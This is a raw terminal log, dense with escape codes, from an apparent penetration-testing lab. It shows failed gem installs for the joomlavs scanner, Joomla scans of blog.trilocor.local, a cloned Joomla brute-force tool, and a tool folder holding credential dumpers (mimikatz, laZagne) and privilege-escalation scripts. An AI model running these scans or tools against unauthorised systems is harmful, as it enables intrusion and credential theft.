#[32mg#[32me#[32mm#[39m#[20C#[32mb#[32mu#[32mn#[32md#[32ml#[32me#[39m#[8C#[?1l#>#[?
2004l
#[J#[A#[48C
#[33mThere was an error installing the locked bundler version (1.16.2), rerun with
the `--verbose` flag for more details. Going on using bundler 2.5.9.#[0m
Fetching gem metadata from https://rubygems.org/...........
#[32mFetching colorize 0.8.1#[0m
#[32mFetching json 2.1.0#[0m
#[32mFetching docile 1.1.5#[0m
#[32mFetching simplecov-html 0.10.2#[0m
#[32mFetching tins 1.16.3#[0m
#[32mFetching ffi 1.9.18#[0m
#[32mFetching thor 0.19.4#[0m
#[32mFetching diff-lcs 1.3#[0m
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing colorize (0.8.1), and Bundler cannot
continue.#[0m
In Gemfile:
colorize
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing json (2.1.0), and Bundler cannot
continue.#[0m
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
simplecov was resolved to 0.14.1, which depends on
json
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing docile (1.1.5), and Bundler cannot
continue.#[0m
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
simplecov was resolved to 0.14.1, which depends on
docile
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
simplecov was resolved to 0.14.1, which depends on
simplecov-html
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing tins (1.16.3), and Bundler cannot
continue.#[0m
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
term-ansicolor was resolved to 1.6.0, which depends on
tins
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing thor (0.19.4), and Bundler cannot
continue.#[0m
In Gemfile:
coveralls was resolved to 0.8.21, which depends on
thor
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing diff-lcs (1.3), and Bundler cannot
continue.#[0m
In Gemfile:
rspec was resolved to 3.7.0, which depends on
rspec-expectations was resolved to 3.7.0, which depends on
diff-lcs
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:54:in
`install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/gem_installer.rb:16:in
`install_from_spec'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
132:in `do_install'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/installer/parallel_installer.rb:
123:in `block in worker_pool'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:62:in `apply_func'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:57:in `block in
process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in `loop'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:54:in
`process_queue'
/var/lib/gems/3.1.0/gems/bundler-2.5.9/lib/bundler/worker.rb:90:in `block (2
levels) in create_threads'
#[0m#[31mAn error occurred while installing ffi (1.9.18), and Bundler cannot
continue.#[0m
In Gemfile:
typhoeus was resolved to 1.3.0, which depends on
ethon was resolved to 0.10.1, which depends on
ffi#[0m
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m916#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:52:20]#[148D#[?1h#=#[?
2004h
#[J#[0;1;2mdirectory#[0m
#[01;34mdata#[0m/ #[01;34mlib#[0m/
#[01;34mspec#[0m/
#[0;1;2mfile#[0m
#[J#[0mCONTRIBUTING.md #[JGemfile #[JGemfile.lock
#[J#[01;32mjoomlavs.rb#[0m* #[JLICENSE #[JREADME.md
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mgem#[39m install bundler && #[32mbundle#[39m
#[90minstall#[39m#[K#[97C[7:52:20]#[0m#[113D########[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[14D#[90mbundle install#[39m#[14D
#[J#[A#[34C#[11D #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[25D#[90mbundler && bundle
install#[39m#[25D#[39mb#[39mu#[39mn#[39md#[39ml#[39me#[39mr#[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[18D#[?1l#>#[?2004l
#[J#[A#[30C
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m917#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:52:38]#[148D#[?1h#=#[?
2004h
#[J#[A#[49C##[0m #[8D#######
#[J#[0;1;2mcommand#[0m
#[J#[0mbundle #[Jbundle3.1 #[Jbundler
#[Jbundler3.1#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mgem#[39m install bundler && #[32mbundle#[39m
install#[K#[97C[7:52:38]#[0m#[120D#[11D#[32mb#[32mu#[32mn#[32md#[32ml#[32me#[39m
inst#[39ma#[39ml#[39ml#[39m #[39m #[39m
#[25D#[39mb#[39mu#[39mn#[39md#[39ml#[39me######
#[J#[0;1;2mcommand#[0m
#[J#[0mbundle #[Jbundle3.1 #[Jbundler
#[Jbundler3.1#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mbundle#[39m install#[K#[125C[7:52:38]#[0m#[148D
#[J#[0;1;2mcommand#[0m
#[J#[0mbundle #[Jbundle3.1 #[Jbundler
#[Jbundler3.1#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mbundle#[39m install#[K#[125C[7:52:38]#[0m#[148D
#[J#[0;1;2mcommand#[0m
#[J#[0mbundle #[Jbundle3.1 #[Jbundler
#[Jbundler3.1#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mbundle#[39m
install#[K#[125C[7:52:38]#[0m#[148D#[39ms#[32mb#[32mu#[32mn#[32md#[32ml#[32me#[39m
install#[14D##[1m#[31ms#[1m#[31mb#[1m#[31mu#[1m#[31mn#[1m#[31md#[1m#[31ml#[1m#[31me
#[0m#[39m######
#[J#[0;1;2mcommand#[0m
#[J#[0mbundle#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msbundle#[0m#[39m
install#[K#[124C[7:52:38]#[0m#[147D##[1m#[31ms#[1m#[31mu#[1m#[31mb#[1m#[31mu#[1m#[3
1mn#[1m#[31md#[1m#[31ml#[1m#[31me#[0m#[39m
install#[14D#[1m#[31md#[1m#[31mb#[1m#[31mu#[1m#[31mn#[1m#[31md#[1m#[31ml#[1m#[31me#
[0m#[39m
install#[14D#[1m#[31mo#[1m#[31mb#[1m#[31mu#[1m#[31mn#[1m#[31md#[1m#[31ml#[1m#[31me#
[0m#[39m install#[14D#[1m#[31m
#[1m#[31mb#[1m#[31mu#[1m#[31mn#[1m#[31md#[1m#[31ml#[1m#[31me#[0m#[39m
install#[14D######[0m#[4m#[32ms#[0m#[4m#[32mu#[0m#[4m#[32md#[0m#[4m#[32mo#[24m#[39m
#[0m#[39m
#[0m#[32mb#[0m#[32mu#[0m#[32mn#[0m#[32md#[0m#[32ml#[0m#[32me#[39m#######[?1l#>#[?
2004l
#[J#[A#[11C
#[0m#[31mAn error occurred while installing nokogiri (1.8.4), and Bundler cannot
continue.
Make sure that `gem install nokogiri -v '1.8.4' --source 'https://rubygems.org/'`
succeeds before bundling.#[0m
In Gemfile:
nokogiri#[0m
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m918#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:53:47]#[148D#[?1h#=#[?
2004hj##[4mj#[24m##[4mj#[24m#[90moomscan --url blog.trilocor.local --enumerate-
components#[39m#[56D
#[0;1;2mcommand#[0m
#[0mjar jardetector jarwrapper java jcat jenv_prompt_info jexec
jffs2dump jffs2reader jjs jls jobs john
join joomscan journalctl jp2a jpackage jpegexiforient
jpeg_extract jpegtran jq js jsesc json5 jsonpointer
#[Jjson_pp #[Jjsonschema #[Jjson_xs #[Jjs-yaml #[JJxrDecApp #[JJxrEncApp
#[J #[4A#[0m#[27m#[24m#[0m
#[6C#[4mj#[24m#[90moomscan --url blog.trilocor.local --enumerate-
components#[39m#[K#[82C[7:53:47]#[0m#[147D##[4mj#[39m#[4mo#[24m
#[J#[0;1;2mcommand#[0m
#[J#[0mjobs #[Jjohn #[Jjoin #[Jjoomscan
#[Jjournalctl#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4mjo#[24m#[90momscan --url blog.trilocor.local --enumerate-
components#[39m#[K#[82C[7:53:47]#[0m#[146D###[4mj#[4mo#[39m#[4mo#[24m
#[J#[0;1;2mcommand#[0m
#[J#[0mjoomscan#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4mjoo#[24m#[90mmscan --url blog.trilocor.local --enumerate-
components#[39m#[K#[82C[7:53:47]#[0m#[145D##[4mo#[39m#[4mm#[24m
#[J#[0;1;2mcommand#[0m
#[J#[0mjoomscan#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4mjoom#[24m#[90mscan --url blog.trilocor.local --enumerate-
components#[39m#[K#[82C[7:53:47]#[0m#[144D##[4mm#[39m#[4ml#[24m#[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[52D##[4ml#[4ma#[24m
#[J#[0;1;2mcommand#[0m
#[J#[0mjoomscan#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4mjoomla#[24m#[K#[133C[7:53:47]#[0m#[142D##[4ma#[4mv#[24m########[24mj#[24mo#
[24mo#[24mm#[24ml#[24ma#[24mvs#[8D#[4mj#[4mo#[4mo#[4mm#[4ml#[4ma#[4mv#[4ms#[24m##[4
ms#[4m.#[24m##[4m.#[4mr#[24m##[4mr#[4mb#[24m#[11D#[24m#[32mj#[24m#[32mo#[24m#[32mo#
[24m#[32mm#[24m#[32ml#[24m#[32ma#[24m#[32mv#[24m#[32ms#[24m#[32m.#[24m#[32mr#[24m#[
32mb#[39m##[32mb#[32m #[39m###[32mb#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[01;34mdata#[0m/ #[01;34mlib#[0m/
#[01;34mspec#[0m/
#[0;1;2mfile#[0m
#[J#[0mCONTRIBUTING.md #[JGemfile #[JGemfile.lock
#[J#[01;32mjoomlavs.rb#[0m* #[JLICENSE #[JREADME.md
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mjoomlavs.rb#[39m#[K#[128C[7:53:47]#[0m#[136D-
#[J#[A#[24C
#[J#[0;1;2mdirectory#[0m
#[01;34mdata#[0m/ #[01;34mlib#[0m/
#[01;34mspec#[0m/
#[0;1;2mfile#[0m
#[J#[0mCONTRIBUTING.md #[JGemfile #[JGemfile.lock
#[J#[01;32mjoomlavs.rb#[0m* #[JLICENSE #[JREADME.md
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mjoomlavs.rb#[39m --url#[K#[122C[7:53:47]#[0m#[130Db
#[J#[0;1;2mdirectory#[0m
#[01;34mlib#[0m/
#[0;1;2mfile#[0m
#[J#[0mCONTRIBUTING.md #[J#[01;32mjoomlavs.rb#[0m* #[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mjoomlavs.rb#[39m --url b#[K#[120C[7:53:47]#[0m#[129Dl
#[J#[A#[44C
#[J#[0;1;2mdirectory#[0m
#[01;34mdata#[0m/ #[01;34mlib#[0m/
#[01;34mspec#[0m/
#[0;1;2mfile#[0m
#[J#[0mCONTRIBUTING.md #[JGemfile #[JGemfile.lock
#[J#[01;32mjoomlavs.rb#[0m* #[JLICENSE #[JREADME.md
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mjoomlavs.rb#[39m --url blog.trilocor.local#[K#[102C[7:53:47]#[0m#[110D-
#[J#[A#[62C
#]2;kali@kali:~/Tools/joomlavs##]1;..ools/joomlavs##]7;file:///home/kali/Tools/
joomlavs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomlavs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m921#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:58:46]#[148D#[?1h#=#[?
2004hc##[1m#[31mc#[0m#[39m##[1m#[31mc#[0m#[39m#[90md
joomlavs#[39m#[10D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaplay cacaview cadaver
callgrind_control cardos-tool catman cc ccache2john
cd-create-profile cd-fix-profile cd-iccdump cftp3 cg_annotate cg_diff
cg_merge check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cisco-decrypt clang++-15 clang++-16 cluster
cmedb colcrt colormgr colrm column comm
compress convert count-14 count-15
count-16 cp cpan cracf2john cracklib-check
cracklib-unpacker crackmapexec createdb cron cryptcat
cryptoflex-tool cupsdisable cupsenable cupstestppd curl
cvtsudoers
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mc#[0m#[39m#[90md
joomlavs#[39m#[K#[128C[7:58:46]#[0m#[147D##[1m#[31mc#[1m#[31md#[0m#[39m###[0m#[32mc
#[0m#[32md#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m joomlavs#[39m#[K#[128C[7:58:46]#[0m#[146D###[32mc#[32md#[32m
#[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mdata#[0m/ #[J#[01;34mlib#[0m/
#[J#[01;34mspec#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[90mjoomlavs#[39m#[K#[128C[7:58:46]#[0m#[145D#[39m.#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #########[4m.#[24m#[90m./NIX01#[39m#######
#[J#[0;1;2mdirectory#[0m
#[J#[01;34m.git#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m.#[24m#[90m./NIX01#[39m#[K#[128C[7:58:46]#[0m#[144D##[4m.#[39m#[4m.#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mLigolo-ng#[0m/
#[J#[01;34mRPCScan#[0m/ #[J#[01;34msubbrute#[0m/
#[J#[01;34mwindapsearch#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../#[24m#[90mNIX01#[39m#[K#[128C[7:58:46]#[0m#[142D#[39m #[39m
#[39m #[39m #[39m ######[?1l#>#[?2004l
#[J#[A#[12C
#[J#]2;cd ../##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m922#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:59:30]#[148D#[?1h#=#[?
2004hg#git clone https://github.com/ajnik/joomla-bruteforce#[52D#[7mg#[7mi#[7mt#[7m
#[7mc#[7ml#[7mo#[7mn#[7me#[7m
#[7mh#[7mt#[7mt#[7mp#[7ms#[7m:#[7m/#[7m/#[7mg#[7mi#[7mt#[7mh#[7mu#[7mb#[7m.#[7mc#[7
mo#[7mm#[7m/#[7ma#[7mj#[7mn#[7mi#[7mk#[7m/#[7mj#[7mo#[7mo#[7mm#[7ml#[7ma#[7m-
#[7mb#[7mr#[7mu#[7mt#[7me#[7mf#[7mo#[7mr#[7mc#[7me#[27m#[52D#[27mg#[27mi#[27mt#[27m
#[27mc#[27ml#[27mo#[27mn#[27me#[27m
#[27mh#[27mt#[27mt#[27mp#[27ms#[27m:#[27m/#[27m/#[27mg#[27mi#[27mt#[27mh#[27mu#[27m
b#[27m.#[27mc#[27mo#[27mm#[27m/#[27ma#[27mj#[27mn#[27mi#[27mk#[27m/
#[27mj#[27mo#[27mo#[27mm#[27ml#[27ma#[27m-
#[27mb#[27mr#[27mu#[27mt#[27me#[27mf#[27mo#[27mr#[27mc#[27me#[52D#[32mg#[32mi#[32mt
#[39m#[49C#[?1l#>#[?2004l
#[J#[A#[58C
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m923#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:59:34]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90ms#[39m##[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90ms#[39m#[K#[137C[7:59:34]#[0m#[147D##[32ml#[32ms#[39m
#[J#[0;1;2mcommand#[0m
#[0mls lsa lsar lsassy lsattr lsblk lsb_release lscpu lsdiff
lsfd lsinitramfs lsipc lsirq lslocks lslogins lsmem lsmod lsmtd
#[Jlsns #[Jlsof #[Jlspci #[Jlspgpot #[Jlspower #[Jlstopo #[Jlstopo-no-
graphics #[Jlsusb #[J
#[3A#[0m#[27m#[24m#[0m
#[6C#[32mls#[39m#[K#[137C[7:59:34]#[0m#[146D#[?1l#>#[?2004l
#[J#[A#[8C
#[J#]2;ls --color=tty##]1;ls##[0m#[01;34mchisel#[0m
#[01;32mfirefox_decrypt.py#[0m laZagne.py #[01;32mLinuxPrivChecker.sh#[0m
#[01;32mnc64.exe#[0m #[01;34mRPCScan#[0m SharpHound.exe
#[01;34mwindapsearch#[0m
#[01;34mCVE-2021-3156#[0m #[01;34mjoomla-bruteforce#[0m #[01;34mLigolo-ng#[0m
#[01;32mLinuxSmartEnumeration.sh#[0m #[01;32mnmap#[0m rubeus.exe
SharpHound.ps1
#[01;34mfirefox_decrypt#[0m #[01;34mjoomlavs#[0m #[01;32mlinpeas.sh#[0m
mimikatz.exe #[01;32mpspy64#[0m #[01;32mSessionGopher.ps1#[0m
#[01;34msubbrute#[0m
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m924#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:59:35]#[148D#[?1h#=#[?
2004hc##[4mc#[24m##[4mc#[24m#[90md
../#[39m######[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaplay cacaview cadaver
callgrind_control cardos-tool catman cc ccache2john
cd-create-profile cd-fix-profile cd-iccdump cftp3 cg_annotate cg_diff
